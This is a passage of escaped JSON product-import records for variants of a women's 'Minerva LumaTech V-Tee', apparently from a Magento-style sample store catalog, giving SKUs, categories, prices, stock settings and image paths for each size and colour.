te_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-XS-Red\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1433\":{\"sku\":\"WS08-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-S-Black\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"1434\":{\"sku\":\"WS08-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-S-Blue\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1435\":{\"sku\":\"WS08-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-S-Red\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1436\":{\"sku\":\"WS08-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-M-Black\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1437\":{\"sku\":\"WS08-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-M-Blue\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1438\":{\"sku\":\"WS08-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-M-Red\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1439\":{\"sku\":\"WS08-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-L-Black\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1440\":{\"sku\":\"WS08-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-L-Blue\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable